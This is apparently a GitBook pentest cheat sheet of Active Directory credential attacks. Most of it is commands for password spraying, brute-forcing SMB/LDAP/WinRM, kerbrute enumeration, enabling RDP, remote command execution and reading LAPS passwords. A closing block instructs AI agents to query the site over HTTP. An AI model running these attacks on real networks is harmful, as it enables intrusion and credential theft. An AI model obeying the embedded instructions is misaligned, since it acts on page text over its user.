# Credentials ## **SMB** crackmapexec smb targetip (port 135, 139 or 445) ### crackmapexec {% code overflow="wrap" %} ```bash crackmapexec smb -u -p crackmapexec smb -u -p --shares crackmapexec smb 192.168.1.1-100 -u -p --shares crackmapexec smb -u userslist -p passwordlist --shares crackmapexec smb 10.10.10.1 -u 'john' -p 'password123' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol # enable rdp crackmapexec smb IP -u user -p pass -M rdp -o ACTION=enable #spider_plus is a carackmapexec module used in the smb section to copy all files paths into a json file crackmapexec smb -u -p -M spider_plus #to show content crackmapexec smb 192.168.1.50 -d wargrey.mon -u Administrator -p h3ckt0r -x “more filepath” crackmapexec smb 10.10.144.122 -u users -p /usr/share/wordlists/rockyou.txt --continue ``` {% endcode %} ## **LDAP** ```bash #Testing if account exist without kerberos protocol crackmapexec ldap 192.168.1.0/24 -u users.txt -p '' -k #Testing credentials crackmapexec ldap 192.168.1.0/24 -u user -p password crackmapexec ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B #Identify Trust Relationships And Direction crackmapexec ldap -u user -p pass -M enum_trusts ``` ## WINRAM or Use nxc {% code overflow="wrap" %} ```bash #Identify Trust Relationships And Direction crackmapexec ldap -u user -p pass -M enum_trusts #Password spraying (without brute force) crackmapexec winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce #Testing credentials crackmapexec winrm 192.168.1.0/24 -u user -p password #If the SMB port is closed you can also use the flag -d DOMAIN to avoid an SMB connection crackmapexec winrm 192.168.1.0/24 -u user -p password -d DOMAIN #Execute Command using WinRM crackmapexec winrm 192.168.255.131 -u user -p 'password' -X whoami #if we meet server 2012 or less, maybe the server has a local administrator with the password you can use --laps refer to local administrator password solution crackmapexec winrm -u user-can-read-laps -p pass --laps ``` {% endcode %} ```bash nxc winrm 10.10.175.105 -u 'j.rock' -p 'Serviceworks1' nxc smb 10.10.175.105 -u 'j.rock' -p 'Serviceworks1' nxc smb 10.10.205.80 -u ' guest' -p '' --rid-brute | grep 'SidTypeUser' ``` ### Nmap {% code overflow="wrap" %} ```bash nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='',userdb=/root/Desktop/usernames.txt ``` {% endcode %} {% hint style="info" %} if we don't join in Domain >> use nslookup {% endhint %} ### nslookup {% code overflow="wrap" %} ```bash nslookup #we can use this script to extract data as Like Name (computer name or Client) and (ip) for /L %i in (1,1,255) do @nslookup 192.168.1.%i 2>null | find "Name" && echo 192.168.1.%i ``` {% endcode %} ### enum4linux ```bash enum4linux -a -u "user" -p "password" ``` {% code overflow="wrap" %} ```bash ./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt #From https://github.com/ropnop/kerbrute/releases ./kerbrute_linux_amd64 -domain -users -passwords -outputfile ``` {% endcode %} ### smbmap ### Find Domain Controller IP ```bash nslookup -type=SRV _ldap._tcp.dc._msdcs.deathstar.rfs ``` ### evil-Winrm ``` evil-winrm -u j.rock@services.local -p Serviceworks1 --ip 10.10.175.105 ```
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://h3ckt0r.gitbook.io/0xsec/elite/network-pentest/active-directory/ad-enumeration/credentials.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.